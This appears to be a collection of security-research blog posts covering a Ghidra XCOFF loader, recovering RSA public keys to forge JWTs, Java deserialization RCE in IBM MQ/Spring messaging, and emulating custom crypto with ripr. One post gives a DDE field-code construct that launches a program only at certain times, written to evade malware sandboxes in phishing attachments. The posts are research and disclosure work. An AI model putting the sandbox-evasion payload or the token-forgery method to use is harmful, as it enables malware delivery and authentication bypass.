Adding XCOFF Support to Ghidra with Kaitai Struct

Author: b

It’s not a secret that we at Silent Signal are hopeless romantics, especially when it comes to classic Unix systems (1, 2, 3). Since some of these systems – that still run business critical applications at our clients – are based on some “exotic” architectures, we have a nice hardware collection in our lab, so we can experiment on bare metal.

We are also spending quite some time with the Ghidra reverse engineering framework that has built-in support for some of the architectures we are interested in, so the Easter holidays seemed like a good time to bring the two worlds together.

My test target was an RS/6000 system running IBM AIX. The CPU is a 32-bit, big-endian PowerPC, that is already (mostly?) supported by Ghidra, but to my disappointment, the file format was not recognized when importing one of the default utilities of AIX to the framework. The executable format used by AIX is XCOFF, and as it turned out, Ghidra only has a partial implementation for it.

At this point I had multiple choices: I could start to work on the existing XCOFF code, or could try to hack the fully functional COFF loader just enough to make it accept XCOFF too, but none of these options made my heart beat faster:

  • Java doesn’t have unsigned primitives, that makes parsing of byte streams painful
  • The existing ~1000 LoC XCOFF implementation includes a wide set of structure definitions with basic getters and setters, but it doesn’t handle more complex schematics of the input
  • The COFF loader expects everything to be little-endian – adding support for BE would require rewriting everything

Instead, I decided to start from scratch, and develop code, that:

  • is reusable in tools other than Ghidra
  • is easy to read, write and extend
  • has excellent debug tools

Ghidra ❤️ Kaitai

The above benefits are provided by Kaitai Struct, “a declarative binary format parsing language”. Instead of implementing a parser in a particular (procedural) language and framework, with Kaitai we can describe the binary format in a YAML-like structure (I know, YAML===bad, but believe me, this stuff works), and then let the Kaitai compiler produce parser code in different languages for us from the same declaration.

Although my Kaitai-fu (picked up mainly through these challenges at Avatao) was rusty , I managed to put together a partial, hacky, but working format declaration in a couple of hours for XCOFF32, based on IBM’s documentation.

This approach also had some benefits from research standpoint, as by reading the specification I could spot

  • inconsistencies between specification and implementation
  • redundant information (e.g. size specifications) in the spec

both of which can lead to interesting parsing bugs! (After this, I wasn’t surprised, when while digging Google I found that IDA, which has built-in XCOFF support has suffered from such bugs in the past)

Coming back to Ghidra development, I could create two implementations from the same Kaitai structure: one in Python, one in Java. I could import the Java implementation as a class in my Ghidra Loader and debug Ghidra-specific code in Eclipse, while check the semantic correctness of the parser and explore the API more comfortably in Python REPL:

$ python -i test.py portmir
.text 0x20
.data 0x40
.bss 0x80
.loader 0x1000
>>> hex(portmir.section_headers[0].s_vaddr)
'0x10000100'

… or just browse the parsed structures in KT‘s awesome WebIDE.

Integrating the generated Java code with Ghidra was a piece of cake:

  • Add Kaitai’s runtime library to the project
  • Wrap the Java byte array provided by Ghidra’s ByteProvider with ByteBufferKaitaiStream, and use the appropriate constructor of the generated class

After the Ghidra-Kaitai interface was set, the only things left were setting the default big-endian PowerPC language, letting Kaitai parse the section headers of the XCOFF file, and mapping them to the Program memory. After this, I could immediately see convincing disassembly and decompilation(!) results:

First disassembly and decompilation result

(Mysterious) Symbols of Love

To give Ghidra more hints about the program structure, I proceeded by parsing symbol information. I don’t want to dive deep into the XCOFF format in this post, but in short, there is a symbol table defined by the .loader section of the binary, that holds information about imports and exports, and there is an optional symbol table potentially referenced by the main header for more detailed information. XCOFF can also contain a TOC (table of contents) that contains valuable structural information for reverse engineering if present.

Since the small utility I used for testing only contained a loader symbol table, I implemented parsing for that, and managed to find the entry function of the file, which was not identified during automatic analysis.

To check my results, I also loaded the sample file into IDA, and to my surprise, this tool showed much more symbols than the loader symbol table! I searched for some of the missing symbols in the binary and found a single occurrence of every missing function name inside the .text section:

Length-prefixed string structure inside the .text section

After a lot of digging (and asking on Twitter) I found that this arrangement matches the Symbol Table Layout described in the specification:

Source: https://www.ibm.com/docs/en/aix/7.2?topic=formats-xcoff-object-file-format

So far, I couldn’t fully decipher this layout, but my working theory is that while the optional symbol table and TOC were removed by stripping, the per-function stabs remained untouched. If so, this is good news for reverse engineers interested in the XCOFF format :)

Update 2021.04.07: As /u/ohmantics pointed out, this is actually the Traceback Table of the function.  Proper support for these structures coming soon!

While the parser of this information should be placed in a proper analyzer module, for now, I put together a simple Python script that tries to parse string structures from between declared functions, and renames functions accordingly:

Pseudocode with additional symbol names

Summary

This blog post showed that Kaitai Struct can be an effective tool to add new formats to Ghidra. Parser development is a tedious and error-prone process that should be outsourced to machines, which don’t get frustrated at the 92nd bitfield definition, and can produce the same, correct implementation for every instance (provided you don’t screw up the parser declaration itself ;) ).

The post allowed a peek inside the XCOFF format too, that seems to worth some security-minded study in parser applications.

We hope that our published code will attract contributors that are also interested in bringing XCOFF to Ghidra or even to other research tools:

Featured image is from Wikipedia (our boxes look much cooler)


Abusing JWT public keys without the public key

Author: b

This blog post is dedicated to those to brave souls that dare to roll their own crypto 

The RSA Textbook of Horrors

This story begins with an old project of ours, where we were tasked to verify (among other things) how a business application handles digital signatures of transactions, to comply with four-eyes principles and other security rules.

The application used RSA signatures, and after a bit of head scratching about why our breakpoints on the usual OpenSSL API’s don’t trigger, but those placed at the depths of the library do, we realized that developers implemented what people in security like to call “Textbook RSA” in its truest sense. This of course led to red markings in the report and massive delays in development, but also presented us with some unusual problems to solve.

One of these problems stemmed from the fact that although we could present multiple theoretical attacks on the scheme, the public keys used in this application weren’t published anywhere, and without that we had no starting point for a practical attack.

At this point it’s important to remember that although public key cryptosystems guarantee that the private key can’t be derived from the public key, signatures, ciphertexts, etc., there are usually no such guarantees for the public key! In fact, the good people at the Cryptography Stack Exchange presented a really simple solution: just find the greatest common divisor (GCD) of the difference of all available message-signature pairs. Without going into the details of why this works (a more complete explanation is here), there are a few things that worth noting:

  • An RSA public key is an (n,e) pair of integers, where n is the modulus and e is the public exponent. Since e is usually some hardcoded small number, we are only interested in finding n.
  • Although RSA involves large numbers, really efficient algorithms exist to find the GCD of numbers since the ancient times (we don’t have to do brute-force factoring).
  • Although the presented method is probabilistic, in practice we can usually just try all possible answers. Additionally, our chances grow with the number of known message-signature pairs.

In our case, we could always recover public keys with just two signatures. At this time we had a quick and dirty implementation based on the gmpy2 library that allowed us to work with large integers and modern, efficient algorithms from Python.

JOSE’s curse

It took a couple of weeks of management meetings and some sleep deprivation to strike me: the dirty little code we wrote for that custom RSA application can be useful against a more widespread technology: JSON Web Signatures, and JSON Web Tokens in particular.

Design problems of the above standards are well-known in security circles (unfortunately these concerns can’t seem to find their ways to users), and alg=”none” fiascos regularly deliver facepalms. Now we are targeting a trickier weakness of user-defined authentication schemes: confusing symmetric and asymmetric keys.

If you are a developer considering/using JWT (or anything JOSE), please take the time to at least read this post! Here are some alternatives too.

In theory, when a JWT is signed using an RSA private key, an attacker may change the signature algorithm to HMAC-SHA256. During verification the JWT implementation sees this algorithm, but uses the configured RSA public key for verification. The problem is the symmetric verification process assumes that the same public key was used to generate the MAC, so if the attacker has the RSA public key, she can forge the signature too.

In practice however, the public key is rarely available (at least in a black-box setting). But as we saw earlier, we may be able to solve this problem with some algebra. The question is: are there any practical factors that would prevent such an exploit?

 CVE-2017-11424

To demonstrate the viability of this method we targeted a vulnerability of PyJWT version 1.5.0 that allowed key confusion attacks as described in the previous section. The library uses a blacklist to avoid key parameters that “look like” asymmetric keys in symmetric methods, but in the affected version it missed the “BEGIN RSA PUBLIC KEY” header, allowing PEM encoded public keys in the PKCS #1 format to be abused. (I haven’t checked how robust key filtering is, deprecating the verification API without algorithm specification is certainly the way to go)

Based on the documentation, RSA keys are provided to the encode/decode API’s (that also do signing and verification) as PEM encoded byte arrays. For our exploit to work, we need to create a perfect copy of this array, based on message and signature pairs. Let’s start with the factors that influence the signature value:

  • Byte ordering: The byte ordering of JKS’s integer representations matches gmpy2‘s.
  • Message canonization: According to the JWT standard, RSA signatures are calculated on the SHA-256 hash of the Base64URL encoded parts of tokens, no canonization of delimiters, whitespaces or special characters is necessary.
  • Message padding: JKS prescribes deterministic PKCS #1 v1.5 padding. Using the appropriate low level crypto API’s (this took me a while, until I found this CTF writeup) will provide us with standards compliant output, without having to mess with ASN.1.

No problem here: with some modifications of our original code, we could successfully recreate the Base64URL encoded signature representations of JWT tokens. Let’s take a look at the container format (this guide is a great help):

  • Field ordering: Theoretically we could provide e and n in arbitrary order. Fortunately PKCS #1 defines a strict ordering of parameters in the ASN.1 structure.
  • Serialization: DER (and thus PEM) encoding of ASN.1 structures is deterministic.
  • Additional data: PKCS #1 doesn’t define additional (optional) data members for public keys.
  • Layout: While it is technically possible to parse PEM data without standard line breaks, files are usually generated with lines wrapped at 64 characters.

As we can see, PKCS #1 and PEM allows little room for changes, so there is a high chance that if we generate a standards compliant PEM file it will match the one at the target. In case of other input formats, such as JWK, flexibility can result in a high number of possible encodings of the same key that can block exploitation.

After a lot of cursing because of the bugs and insufficient documentation of pyasn1 and asn1 packages, asn1tools finally proved to be usable to create custom DER (and thus PEM) structures. The generated output matched perfectly with the original public key, so I could successfully demonstrate token forgery without preliminary information about the asymmetric keys:

We tested with the 2048-bit keys from the JKS standard: it took less than a minute on a laptop to run the GCD algorithm on two signatures, and the algorithm produced two candidate keys for PKCS #1 which could be easily tested.

As usual, all code is available on GitHub. If you need help to integrate this technique to your Super Duper JWT Haxor Tool, use the Issue tracker!

Applicability

The main lesson is: one should not rely on the secrecy of public keys, as these parameters are not protected by mathematical trapdoors.

This exercise also showed the engineering side of offensive security, where theory and practice can be far apart: although the main math trick here may seem unintuitive, it’s actually pretty easy to understand and implement. What makes exploitation hard, is to figure out all those implementation details that make pen and paper formulas work on actual computers. It won’t be a huge surprise to anyone who worked with digital certificates and keys that at least 2/3 of the work involved here was about reading standards, making ASN.1 work, etc. (Not to mention constantly converting byte arrays and strings in Python3 :P) Interestingly, it seems that the stiffness of these standards makes the format of the desired keys more predictable, and exploitation more reliable!

On the other hand, introducing unpredictable elements in the public key representations can definitely break the process. But no one would base security on their favorite indentation style, would they?


Unexpected Deserialization pt.1 – JMS

Author: b

On a recent engagement our task was to assess the security of a service built on IBM Integration Bus, an integration platform for Java Messaging Services. These scary looking enterprise buzzwords usually hide systems of different complexities connected with Message Queues. Since getting arbitrary test data in and out of these systems is usually non-trivial (more on this in the last paragraph), we opted for a white-box analysis, that allowed us to discover interesting cases of Java deserialization vulnerabilities.

First things first, some preliminary reading:

  • If you are not familiar with message queues, read this tutorial on ZeroMQ, and you’ll realize that MQ’s are not magic, but they are magical :)
  • Matthias Kaiser’s JMS research provided the basis for this post, you should read it before moving on

Our target received JMS messages using the Spring Framework. Transport of messages was done over IBM MQ (formerly IBM Websphere MQ), this communication layer and the JMS API implementation were both provided by IBM’s official MQ Client for Java.

Matthias provides the following vulnerable scenarios regarding Websphere MQ:

Source

We used everyone’s favorite advanced source code analysis tool – grep – to find references to the getObject() and getObjectInternal() methods, but found no results in the source code. Then we compiled the code and set up a test environment using the message broker Docker image IBM provides (this spared a lot of time), and among some dynamic tests, we ran JMET against it. To our surprise we popped a calculator in our test environment!

Now this was great, but to provide meaningful resolutions to the client, we needed to investigate the root cause of the issue. The application was really simple: it received a JMS message, created an XML document from its contents, and done some other basic operations on the resulting Document objects. We recompiled the source with all the parsing logic removed to see if this is a framework issue – fortunately it wasn’t, the bug didn’t trigger. This narrowed down the code to just a few lines, since the original JMS message was essentially discarded after the XML document was constructed.

The vulnerability was in the code responsible for retrieving the raw contents of the JMS message. Although JMS provides strongly typed messages, and the expected payload were strings, the developers used the getBody() method of the generic JMSMessage class to get the message body as a byte array. One could think (I sure did) that such a method would simply take a slice of the message byte stream, and pass it back to the user, but there is a hint of something weirder in the method signature:

 <T> T    getBody(java.lang.Class<T> c);

The method can return objects of arbitrary class?! After decompiling the relevant classes, all became clear: the method first checks if the class parameter is compatible with the JMS message type, and if it is, it casts the object in the body and returns it. If the JMS message is an Object message, it deserializes its contents, twice: first for the compatibility check, then to create the return object.

I don’t think this is something an average developer should think about, even if she knows about the dangers of deserialization. But this is not the only unintuitive thing that I encountered while falling down this rabbit hole.

Spring’s MessageConverter

At this point I have to emphasize, that our original target wasn’t exactly built according to best practices: JMSMessage is specific to IBM’s implementation, so using it directly chains the application to the messaging platform, which is probably undesirable. To hide the specifics of the transport, the more abstract Message class is provided by the JMS API, but there are even more elegant ways to handle incoming messages.

When using Spring one can rely on the built-in MessageConverter classes that can automatically convert Messages to more meaningful types. So – as demonstrated in the sample app – this code:

receiveMessage(Message m){ /* Do something with m, whatever that is */ }

can become this:

receiveMessage(Email e){ /* Do something with an E-mail */ } 

Of course, using this functionality to automatically convert messages to random Serializable objects is a call for trouble, but Spring’s SimpleMessageConverter implementation can also handle simple types like byte arrays.

To see if converters guard against insecure deserialization I created multiple branches of IBM’s sample application, with different signatures for receiveMessage(). To my surprise, RCE could be achieved in almost all of the variants, even if receiveMessage()’s argument is converted to a simple String or byte[]! IBM’s original sample is vulnerable to code execution too (when the class path contains appropriate gadgets).

After inspecting the code a bit more it seems, that listener implementations can’t expect received messages to be of a certain, safe type (such as TextMessage, when the application works with Strings), so they do their best to transform the incoming messages to a type expected by the developer. Additionally, in case when an attacker sends Object messages, it is up to the transport implementation to define the serialization format and other rules. To confirm this, I ran some tests using ActiveMQ for transport, and the issue couldn’t be reproduced – the reason is clear from the exception:

Caused by: javax.jms.JMSException: Failed to build body from content. Serializable class not available to broker. Reason: java.lang.ClassNotFoundException: Forbidden class org.apache.commons.collections4.comparators.TransformingComparator!
This class is not trusted to be serialized as ObjectMessage payload. Please take a look at http://activemq.apache.org/objectmessage.html for more information on how to configure trusted classes.
at org.apache.activemq.util.JMSExceptionSupport.create(JMSExceptionSupport.java:36) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.apache.activemq.command.ActiveMQObjectMessage.getObject(ActiveMQObjectMessage.java:213) ~[activemq-client-5.15.9.jar!/:5.15.9]
at org.springframework.jms.support.converter.SimpleMessageConverter.extractSerializableFromMessage(SimpleMessageConverter.java:219) ~[spring-jms-5.1.7.RELEASE.jar!/:5.1.7.RELEASE]

As we can see, ActiveMQ explicitly prevents the deserialization of objects of known dangerous classes (commons-collections4 in the above example), and Spring expects such safeguards to be the responsibility of the JMS implementations – too bad IBM MQ doesn’t have that, resulting in a deadly combination of technologies.

In Tim Burton’s classic Batman, Joker poisoned Gotham City’s hygene products, so that in certain combinations they produce the deadly Smylex nerve toxin. Image credit: horror.land

Update 2020.09.04.: I contacted Pivotal (Spring’s owner) about the issue, and they confirmed, that they “expect messaging channels to be trusted at application level”. They also agree, that handling ObjectMessages is a difficult problem, that should be avoided when possible: their recommendation is to implement custom MessageConverters that only accepts JMS message types, that can be safely handled (such as TextMessage or BytesMessage).

Conclusions and Countermeasures

In Spring, not relying on the default MessageConverters, and expecting simple Message (or JMSMessage in case of IBM MQ) objects in the JmsListener prevents the problem, independently from the transport implementation. Simple getters, such as getText() can be safely used after casting. The use of even the simplest converted types, such as TextMessage with IBM MQ is insecure! Common converters, such as the JSON based MappingJackson2MessageConverter need further research, as well as other transports, that decided not to implement countermeasures:

Patches resulted from Matthias’s research

Static Analysis

After identifying vulnerable scenarios I wanted to create automated tests to discover similar issues in the future. When aiming for insecure uses of IBM MQ with Spring, the static detection method is pretty straightforward:

  • Identify the parameters of methods annoted with JmsListener
  • Find cases where generic objects are retrieved from these variables via the known vulnerable methods.

In CodeQL a simple predicate can be used to find appropriately annotated sources:

class ReceiveMessageMethod extends Method {
ReceiveMessageMethod() {
this.getAnAnnotation().toString().matches("JmsListener")
}
}

ShiftLeft Ocular also exposes annotations, providing a simple way to retrieve sources:

val sources=cpg.annotation.name("JmsListener").method.parameter

Identifying uses of potentially dangerous API’s is also reasonably simple both in CodeQL:

predicate isJMSGetBody(Expr arg) {
exists(MethodAccess call, Method getbody |
call.getMethod() = getbody and
getbody.hasName("getBody") and
getbody.getDeclaringType().getAnAncestor().hasQualifiedName("javax.jms", "Message") and
arg = call.getQualifier()
)
}

… and in Ocular:

val sinks=cpg.typ.fullName("com.ibm.jms.JMSMessage").method.name("getBody").callIn.argument

Other sinks (like getObject()) can be added in both languages using simple boolean logic. An example run of Ocular can be seen on the following screenshot:

With Ocular, we can also get an exhaustive list of API’s that call ObjectInputStream.readObject() for the transport implementation in use, based on the available byte-code, without having to recompile the library:

ocular> val sinks = cpg.method.name("readObject")
sinks: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@22be2e19
ocular> val sources=cpg.typ.fullName("javax.jms.Message").derivedType.method
sources: NodeSteps[Method] = io.shiftleft.semanticcpg.language.NodeSteps@4da2c297
ocular> sinks.calledBy(sources).newCallChain.l

This gives us the following entry points in IBM MQ:

  • com.ibm.msg.client.jms.internal.JmsMessageImpl.getBody – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObject – Already identified
  • com.ibm.msg.client.jms.internal.JmsObjectMessageImpl.getObjectInternal – Already identified
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.isBodyAssignableTo – Private method (used for type checks, see above)
  • com.ibm.msg.client.jms.internal.JmsMessageImpl.messageToJmsMessageImpl – Protected method
  • com.ibm.msg.client.jms.internal.JmsStreamMessageImpl.<init> – Deserializes javax.jms.StreamMessage objects.

The above logic can be reused for other implementations too, so accurate detections can be developed for reliant applications. Connecting paths between applications and transport implementations doesn’t seem possible with static analysis, as the JMS API loads the implementations dynamically. Our static queries are soon to be released on GitHub.

A Word About Enterprise Architecture and Threat Models

When dealing with targets similar to the one described in this article, it is usually difficult to create a practical test scenario that is technically achievable, and makes sense from a threat modeling perspective.

In our experience, this problem stems from the fact, that architectures like ESB and the tools built around them provide abstractions that hide the actual implementation details from the end users and even administrators. And when people think about things like “message-oriented middleware” instead of long-lived TCP connections between machines, it can be hard to figure out that at the end of day, one can simply send potentially malicious input to 10.0.0.1 by establishing a TCP connection to port 1414 on 10.1.2.3. This means that in many cases it’s surprisingly hard to find someone who can specify in technical terms where and how an application should be tested, not to to mention the approval of these tests. Another result of this, is that in many cases message queues are treated as inherently trusted – no one can attack a magic box, that no one (at least none of us) knows how it exactly works, right?

Technical security assessments can be great opportunities to not only discover vulnerabilities early, but also to get more familiar with the actual workings of these complex, but not incomprehensible systems. It the end, we are the ones whose job is to understand systems from top to bottom.

Special thanks to Matthias Kaiser and Fabian Yamaguchi for their tools and help in compiling this blog post! Featured image from Birds of Prey.


Uninitialized Memory Disclosures in Web Applications

Author: b

While we at Silent Signal are strong believers in human creativity when it comes to finding new, or unusual vulnerabilities, we’re also constantly looking for ways to transform our experience into automated tools that can reliably and efficiently detect already known bug classes. The discovery of CVE-2019-6976 – an uninitialized memory disclosure bug in a widely used imaging library – was a particularly interesting finding to me, as it represented a lesser known class of issues in the intersection of web application and memory safety bugs, so it seemed to be a nice topic for my next GWAPT Gold Paper.

(more…)


Self-defenseless – Exploring Kaspersky’s local attack surface

Author: b

I had the pleasure to present my research about the IPC mechanisms of Kaspersky products at the IV. EuskalHack conference this weekend. My main motivation for this research was to further explore the attack surface hidden behind the self-defense  mechanisms of endpoint security software, and I ended up with a local privilege escalation exploit that could be combined with an older self-defense bypass to make it work on default installations. I hope that the published information helps other curious people to dig even deeper and find more interesting pieces of code.

The presentation and some code examples are available on GitHub.

My local privilege-escalation exploit demo can be watched here:

The exploit code will be released at a later time on GitHub, so you can have some fun reconstructing it based on the slides ;)


Drop-by-Drop: Bleeding through libvips

Author: b

During a recent engagement we encountered a quite common web application feature: profile image uploads. One of the tools we used for the tests was the UploadScanner Burp Suite extension, that reported no vulnerabilities. However, we noticed that the profile picture of our test user showed seemingly random pixels. This reminded us to the Yahoobleed bugs published by Chris Evans  so we decided to investigate further.

(more…)


Bare Knuckled Antivirus Breaking

Author: b

Endpoint security products provide an attractive target for attackers because of their widespread use and high-privileged access to system resources. Researchers have already demonstrated the risks of complex input parsing with unmanaged code and even sloppy implementation of client- and server-side components of these products. While these attacks are still relevant, it is still generally overlooked how security software breaches some important security boundaries of the operating system. In this research we first present a generic self-defense bypass technique that allows deactivation of multiple endpoint security products. Then we demonstrate that self-defense can hide exploitable attack surface by exploiting local privilege escalation vulnerabilities in 6 products of 3 different vendors. You can download our whitepaper here:

Bare-Knuckled Antivirus Breaking (PDF)

The following part of this blog post contains demonstration videos and some additional notes about the exploits described in the paper. We will also use this post to publish up-to-date information about affected vendors and fixes.

(more…)


Emulating custom crytography with ripr

Author: b

Custom cryptography and obfuscation are recurring patterns that we encounter during our engagements and research projects. Our experience shows that despite industry best practices and long history of failures these constructs are not getting fixed without clear demonstration of their flaws. Most of the time demonstration requires instrumenting the original software or reimplementing the algorithms from scratch. This way we can create specially crafted encrypted messages, find hash collisions etc.

Ripr  is a really exciting tool “that automatically extracts and packages snippets of machine code into a functionally identical python class backed by Unicorn-Engine”. I was really curious about how effectively this tool can be used so I decided to create a new sample that models some of the algorithms we’ve seen and write up my experiences as a reference for others.

The test program

To put ripr  to the test I grabbed the first decent looking RC4 implementation in C* and added an additional XOR step with a hardcoded 4-byte key to it. This small addition would simulate hardcoded keys, lookup tables and other constants that are commonly used in standard and non-standard algorithms alike. As we will see, resolution of these structures is not a trivial task for a static analyzer.

I compiled the code with GCC, not stripping the symbols, so I could work as if I already did the reversing work to identify the subroutines of interest. I then loaded the binary to Binary Ninja and made ripr export the key scheduler (KSA) and the keystream generator (PRGA) functions as two Python classes that I copied to a single script. As this was in the middle of a busy day I just slapped some instantiation code to it to see if the thing runs without any obvious compilation errors.

ksa=KSA() # Instanitate key scheduler
ksa.run(key,S) # initialize cipher state (S) with key
print repr(S) 
prga=PRGA() # Instantiate keystream generator
prga.run(S,plain,cipher) # Run keystream generator with the calculated state
print repr(cipher)

It did, but in order to make the code do anything useful we need to understand what was and what wasn’t generated for us by ripr.

* I didn’t verify the correctness of this implementation and even noticed some oddities (like calculation of the ciphertext size), but any mistakes would make my candidate even better for a “homebrew” algorithm.

First commit (e1569ae)

The first thing I noticed is that the generated code doesn’t handle output arguments: Arguments are just written to the memory of the emulator, but ripr doesn’t know that some of these allocations will contain important data at the end of the run of the function. This can be easily fixed by reading memory from addresses pointed to by the argAddr_N variables. In our case the key scheduler populates the S buffer, so we have to read back the memory of arg_1 of KSA.run():

-        return self.mu.reg_read(UC_X86_REG_RAX)
+        return self.mu.mem_read(argAddr_1,256)

As you can see I chose to implement more “pythonic” interface for this method, returning the object of interest instead of using an output variable. You can see similar changes in the later commits where I’m finalizing the code.

When I executed this code the KSA function executed successfully (but not necessarily correctly!) but the PRGA raised the following exception:

Traceback (most recent call last):
  File "prga.py", line 115, in <module>
    prga.run(S,plain,cipher)
  File "prga.py", line 57, in run
    self._start_unicorn(0x400733)
  File "prga.py", line 44, in _start_unicorn
    raise e
unicorn.unicorn.UcError: Invalid memory write (UC_ERR_WRITE_UNMAPPED)

 

Second commit (aaf375c)

It seems that the emulated program tries to access unmapped memory. Since the exception is caused by emulated code, the stack trace doesn’t provide information about what exactly went wrong. To debug this we need to know the instruction and the context where the emulation fails. One way to do this is to hook each instruction in Unicorn Engine but for me it was easier to extend the auto-generated exception handler code to print out context information when an unhandled exception happens:

             else:
+                print "RIP: %08X" % self.mu.reg_read(UC_X86_REG_RIP)  # 0x4007dd: mov eax, dword [rbp-0x1c]
+                print "EAX: %08X" % (self.mu.reg_read(UC_X86_REG_EAX))
                 raise e

The offending instruction can be seen as comment above. EAX pointed to memory at slightly above 0x4000 so I simply added a new mapping to the constructor of PRGA and the exception went away:

+        self.mu.mem_map(0x1000 * 4, 0x1000) # Missed mapping

After looking at the exception handlers I also tried to implement strlen() as a hook function that is meant to replace the original import call during emulation. Hooks for impoerted functions work by checking memory access exceptions against a defined list of addresses: if the saved return address points after an imported function call, the generated code handles the exception by calling the corresponding hook function. As far as I can tell return values should be manually set in the hook function (in this case setting EAX to the string length), but I also gave the function a return value for easier debugging (it turned out my original code had a pretty obvious bug, can you spot it?).

Third commit (5680b36)

So the code ran fine, but the results were different from what I got from the original binary. Two things were suspicious though:

  • My static obfuscator string (“ABCD”) was nowhere to be found in the generated code. This shows that manual reverse engineering is still crucial when using ripr.
  • My strlen() implementation was never called. Since hook functions are really easy to write, I suggest to always add some debug code (even simple prints) to them to prevent bugs like this. This is also a good way to have a high-level trace of the execution of the emulator.

With enough infromation obtained by reversing the program the first problem can be resolved easily. In this case I also had a suspicious piece of memory in the generated code that I couldn’t originally connect to anything:

self.data_0 = '00000000000000000000000000000000540a400000000000'.decode('hex')

It turns out that my obfuscator key is located at 0x400a54. This piece of memory held the pointer to it, but that region was not properly populated (although it was mapped so it didn’t cause an exception). Similarly, the import for strlen() was located at 0x4004d0 in the original binary, but not populated in the generated code by ripr. Adding these two lines to the PRGA constructor resolved these issues:

self.mu.mem_write(0x400a54L, "4142434400".decode('hex'))
self.mu.mem_write(0x4004d0L, "ff25410b2000".decode('hex'))

Note that the code written for the strlen() import is just a jump pointing to some memory unmapped in the emulator. This way an exception will be raised that can be handled by the code responsible for calling the hook function in Python.

Fourth commit (c9c7d3c)

What I failed to notice before this commit was that KSA also relied on strlen(). But since it was in a separate class using a different emulator instance my previous changes didn’t affect it. One could merge the classes, but for the sake of simplicity I chose to just duplicate the code. After this the emulated and the original program gave identical results.

Conclusion

All in all I managed to create a working emulator in about two hours, without any prior experience with ripr. Assuming proper understanding of the targeted program I expect about the same effort needed for experienced users in case of real life targets: the complexity of the task is mostly dependent on the number of unresolved data and code references, not the complexity of the algorithm itself. Considering the amount of work needed to reimplement cryptographic code, or instrumenting large software, ripr will definitely be on the top of my list of tools when the next homebrew crypto-monster appears!


Conditional DDE

Author: b

Here’s a little trick we’d like to share in the end-of-year rush:

DDE is the new black, malware authors quickly adopted the technique and so did pentesters and red teams in order to simulate the latest attacks. According to our experience trivial DDE payloads (like fully readable PowerShell scripts) slip through conventional detections, but process monitoring can cause some headache: powershell.exe launched from Office is surely an obvious indicator of something phishy.

Malware sandboxes (that execute incoming files in virtualized environments to learn more about their purpose) are an example of defensive tools that implement such detection. And although they are commonly seen as all-in-one APT stoppers, these tools are in fact quite limited in terms of simulating an actual target, that provides a broad venue for their bypass.  Evasion is generally performed by conditional checks to determine if the payload would run in the right domain, timezone, etc. If the condition is not met, the payload remains dormant so the instrumentation in the sandbox won’t catch anything suspicious.

So how do we implement this with DDE? Looking at some public obfuscation techniques it’s easy to spot the IF field code, that allows conditional parsing of other fields in the document. We can combine this with the DATE or TIME codes to construct a document with time-based execution:

{SET P {IF {TIME \@ "m"} > 13 "C:\\Winows\\System32\\calc.exe" ""}}
{DDEAUTO {REP P} "s2"}

The above DDE construct only executes calc.exe if the minutes of the hour are past 13. Suppose you send attachments that only execute code after 9:00 AM during the night – by the time someone opens the bait, the analyzer already marked it safe hours ago. Or better yet, you can rely on the resource constraints of the sandbox and make it cache/whitelist your first shot before you send the rest. These methods can be further refined with the use of fields like USERNAME or even FILENAME.

By the way, is DDE Turing-complete?


Notes on McAfee Security Scan Plus RCE (CVE-2017-3897)

Author: b

At the end of last month, McAfee published a fix for a remote code execution vulnerability in its Security Scan Plus software. Beyond Security, who we worked with for vulnerability coordination published the details of the issue and our PoC exploit on their blog. While the vulnerability itself got some attention due to its frightening simplicity, this is not the first time SSP contained similarly dangerous problems, and it’s certainly not the last. In this post, I’d like to share some additional notes about the wider context of the issue.

(more…)